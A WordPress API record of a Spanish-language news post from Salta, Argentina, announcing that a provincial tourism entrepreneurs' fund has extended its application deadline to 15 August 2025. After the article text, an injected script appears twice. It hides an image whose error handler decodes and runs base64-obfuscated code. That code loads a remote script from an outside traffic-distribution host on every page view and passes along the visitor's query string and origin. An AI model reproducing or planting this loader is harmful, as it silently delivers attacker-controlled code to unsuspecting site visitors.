{"id":5349,"date":"2025-07-22T08:56:14","date_gmt":"2025-07-22T11:56:14","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5349"},"modified":"2025-08-13T23:25:51","modified_gmt":"2025-08-14T02:25:51","slug":"el-fondo-de-emprendedores-turisticos-amplia-su-plazo-de-inscripcion-hasta-el-15-de-agosto","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5349","title":{"rendered":"El Fondo de Emprendedores Tur\u00edsticos ampl\u00eda su plazo de inscripci\u00f3n hasta el 15 de agosto"},"content":{"rendered":"\n<p><strong><em>Por la alta demanda de interesados, el Ministerio de Turismo y Deportes anunci\u00f3 la extensi\u00f3n del plazo de inscripci\u00f3n al Fondo de Emprendedores Tur\u00edsticos, permitiendo que m\u00e1s emprendedores, municipios y entidades del sector puedan sumarse con sus proyectos en toda la provincia.<\/em><\/strong><\/p>\n\n\n\n<p>El Ministerio de Turismo y Deportes de Salta inform\u00f3 que, debido al inter\u00e9s y la alta demanda registrada, se ampl\u00eda hasta el 15 de agosto de 2025 el plazo para postular proyectos al Fondo de Emprendedores Tur\u00edsticos.<\/p>\n\n\n\n<p>Este fondo destina 164 millones de pesos en aportes no reembolsables a proyectos tur\u00edsticos innovadores y sostenibles, con el objetivo de diversificar y fortalecer la oferta tur\u00edstica de Salta, generando empleo, valor agregado y desarrollo local en cada regi\u00f3n.<\/p>\n\n\n\n<p>Pueden postularse personas f\u00edsicas, grupos asociativos informales, personas jur\u00eddicas sin fines de lucro (ONGs, c\u00e1maras de turismo del interior) y municipios, para iniciativas vinculadas a distintas modalidades de turismo como naturaleza, aventura, cultural, gastron\u00f3mico, rural y religioso, entre otros.<\/p>\n\n\n\n<p>El Fondo de Emprendedores Tur\u00edsticos, presentado por la ministra de Turismo y Deportes, Manuela Arancibia, se implementa en el marco de un convenio con el Ministerio de Producci\u00f3n y Desarrollo Sustentable, a trav\u00e9s del Fondo Provincial de Inversiones, para potenciar proyectos tur\u00edsticos que promuevan un turismo sostenible, inclusivo y con identidad salte\u00f1a.&nbsp;<\/p>\n\n\n\n<p>Las postulaciones deben realizarse a trav\u00e9s de&nbsp;<a href=\"http:\/\/fondo.turismosalta.gov.ar\/\">http:\/\/fondo.turismosalta.gov.ar\/<\/a>&nbsp;&nbsp;mientras que quienes a\u00fan no hayan completado las capacitaciones obligatorias podr\u00e1n inscribirse y conocer las fechas de los pr\u00f3ximos encuentros virtuales en&nbsp;<a href=\"http:\/\/www.turismotecapacita.com\/\">http:\/\/www.turismotecapacita.com\/<\/a><\/p>\n\n\n\n<p>Con esta pr\u00f3rroga, el Ministerio de Turismo y Deportes busca garantizar que m\u00e1s emprendedores y municipios accedan a esta herramienta que fortalece la competitividad y sostenibilidad del turismo en toda la provincia.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretaria de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Por la alta demanda de interesados, el Ministerio de Turismo y Deportes anunci\u00f3 la extensi\u00f3n del plazo de inscripci\u00f3n al Fondo de Emprendedores Tur\u00edsticos, permitiendo que m\u00e1s emprendedores, municipios y entidades del sector puedan sumarse con sus proyectos en toda la provincia. El Ministerio de Turismo y Deportes de Salta inform\u00f3 que, debido al inter\u00e9s [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5350,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[15],"tags":[],"class_list":{"0":"post-5349","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5349"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5349"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5349\/revisions"}],"predecessor-version":[{"id":6436,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5349\/revisions\/6436"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5350"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5349"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5349"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5349"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}